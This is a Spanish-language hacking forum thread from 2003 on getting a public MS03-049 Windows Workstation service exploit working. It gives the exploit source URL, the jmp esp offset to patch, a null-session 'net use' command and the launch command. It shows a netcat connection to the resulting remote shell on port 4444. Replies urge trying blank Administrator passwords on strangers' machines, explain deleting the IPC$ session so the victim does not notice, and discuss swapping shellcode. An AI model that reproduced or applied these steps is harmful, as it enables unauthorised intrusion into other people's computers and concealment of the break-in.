0349 por fin......

Exploit @ http://www.securitylab.ru/_exploits/0349.c.txt

Segun parece: i can only get this to work on XP. Win2k responds with like op rng error stating

Simplemente me he limitado a quitar #include "LMJoin.h" pq me da error al compilar (en algunas paginas de M$ MSDN se hace referencia a ella pero no la he conseguido encontrar por ningun sitio)
y a modificar el offset en la linea DWORD jmpesp = 0x7518A747;

c:\findjmp wkssvc.dll esp
Scanning wkssvc.dll for code useable with the esp register
0x75109975   push esp - ret
0x7511A747   jmp esp
0x7511C890   push esp - ret
Finished Scanning wkssvc.dll for code useable with the esp register
Found 3 usable addresses

Jejejeje, tp difieren mucho los offsets para un Win XP Sp0 ruso y uno español....

Solo he conseguido q me compile con el VC++ (el dev c++ me daba muchos fallos ·_·U ) y al construir el ejecutable no da problemas...

Lo he probado remotamente, desde un win xp sp0 a otro... pero primero hay q establecer una sesion nula al IPC$ remoto...

c:\net use \\ip_remota\IPC$ "" /user: ""
c:\0349 ip_remota 0
Attacking: ip_remota

GetProcAddr: 71bf9530
Sending exploit, you should be able to nc to the host

Abro nueva consola...
c:\nc ip_remota 4444 Boum!!!! obtengo c:\windows\system32 remoto!!

Despues de cerrar la conexion...
1) en el equipo atacado, haciendo un netstat -an, todavia queda el CLOSE_WAIT. Hasta el siguiente reinicio no he podido volver a obtener el shell remoto con nc.
2) en el equipo atacante, aparece una ventana de windows q dice el siguiente mensaje:

***********************************
Microsoft Visual c++ Debug Library

Debug Error!

Program: c:\xploit.exe
Module:
File: i386\chkesp.c
Line: 42

The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.

Anular, Reintentar, Omitir

***********************************

Bueno, antes de ejecutar el exploit, probe el shellcode y se empezaron a abrir/cerrar un monton de ventanas de consola de forma incontrolada. Tuve q reiniciar!!

PD: Gracias a Rojodos, Potato, Derek.... por toda la informacion q he podido encontrar en este foro, ha sido de gran ayuda...
Ahora viene lo mejor, entender todo el codigo del exploit, aprender como funcionan las shellcodes, toda la teoria del buffer overflow, etc... solo necesitaba un aliciente para empezar con ello ^_^

PD2: A ver si consigo q me rulen el resto de exploits q andan por aqui....

Saludos....

que bonito que bonito pero nos puedes pasar el exploit compilao y si se puede tambien el source?

Gracias

Citar

c:\net use \\ip_remota\IPC$ "" /user: ""

en donde user tiene que ser user o el nombre del usuario que este logueado?????????????????????/

Enorawena gospel

Aunq eso de que la shellcode se ponga a abrir ventanas como una loca es algo muy sospechoso...

Vicecity, dos cosas:

- Si se publican exploits en source, sera por algo... nada de exploits compilados a lo script kiddie...

- Eso es una SESION NULA de acceso a recursos compartidos, investiga que es....

Salu2

Citar

- Si se publican exploits en source, sera por algo... nada de exploits compilados a lo script kiddie...

- Eso es una SESION NULA de acceso a recursos compartidos, investiga que es....

Salu2

"gracias" eh y tu eres el primero que postea y cuelga los exploits y tus "shellcodes".

Cita de: vicecity en 26 Diciembre 2003, 23:18

que bonito que bonito pero nos puedes pasar el exploit compilao y si se puede tambien el source?

Gracias

Pero mira q eres vago, vicecity!!!!

Si te doy la dirección del codigo del exploit y encima te explico paso a paso lo q hay q cambiar pa q te funcione, pa q quieres q te pase mi source o el ejecutable??? Creo q tardas tu menos tiempo en adaptarlo del original.... ¬_¬ dont be a skript kiddie!!!

Lo de la sesion nula al IPC$ remoto, pone en el comentario del exploit q es una de las condiciones pa q el exploit funcione...
Sesion nula: Usuario = "", contraseña = ""

Se ve q no te has estudiado para nada el acceso a traves de recursos compartidos:
Jejejeje, prueba contra algun Win2k: net use Z: \\ip_objetivo\c$ "" /user:Administrador, te sorprenderia ver la cantidad de idiotas q dejan en blanco su contraseña de Admin...

Por cierto, se me olvido comentar al final del anterior post q si despues de usar el exploit, no nos desconectamos del IPC$ remoto y al tio se le ocurre hacer un "net use" va a ser un canteo, asi q despues de desconectarte del nc, "net use \\ip_objetivo\IPC$ /delete"

Rojodos... gracias
Si, lo de la shellcode huele un poco mal.
Tenia una duda al respecto. Puedo cambiar la shellcode de este exploit por alguna otra, como por ejemplo la q viene en el post exploit win2k/XP (MS03-049) q se conecta al 5555, y q el exploit siga funcionando??????

Nos vemos!!!

Prueba a ver si funciona

Yo diria que si funciona, sin ningun problema.

Vicecity, no voy a discutir contigo, pero mi shellcode la pase en source, es mas, en ASM...

Nada compilado.

Salu2

hard-h2o modding Foros de ayuda Yashira.org Videojuegos indetectables.net

Noticias Informatica Seguridad Informática ADSL Foros en español eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.